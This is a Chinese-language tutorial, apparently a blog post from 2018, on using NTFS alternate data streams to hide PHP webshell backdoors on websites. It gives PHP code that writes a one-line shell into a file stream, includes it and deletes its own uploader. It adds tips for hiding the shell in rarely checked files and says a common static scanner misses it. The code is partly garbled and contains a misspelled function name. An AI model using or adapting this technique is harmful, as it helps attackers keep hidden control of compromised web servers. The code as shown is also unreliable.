NTFS歪计

2018/8/10/11：20

前言

在《NTFS歪计（上篇）》中，我们简要的知道了NTFS文件系统的一些特性。

在本篇，笔者会介绍如何利用这样的特性隐藏后门。

webshell后门

exec('echo "">>index.php:key.php');

#把一句话写进首页文件的a.php

$key =

echo "">>a.php

key;

exec($key);

#文件包含，直接去包含文件流

$url = $_SERVER['PHP_SELF'];

$filename = substr($url,strrops($url,'/')+1);

@unlink($filename);

# 自己删掉自己

?>

将上述代码写成key.php文件上传。

然后让其之执行，如下：

（虽然有报错，但是该执行的都执行了）

可以发现网站目录中多了a.php，没了之前上传的key.php了。

回到黑客视角：

携带上post的key数据：

我们会发现，此时的后门可执行，且对站长有一定的隐蔽性。

注意一下，在此例中，a.php只是代表某些站长不常看的一些php文件。

如：

网站有很多目录，一定有一些目录，如ba_pwd_attacks_1.php等等比较长的php文件，我们可以将a.php的内容echo进去，从而及时转移自己的后门。

一般安全狗的静态扫描不会闻到这种隐藏的后门。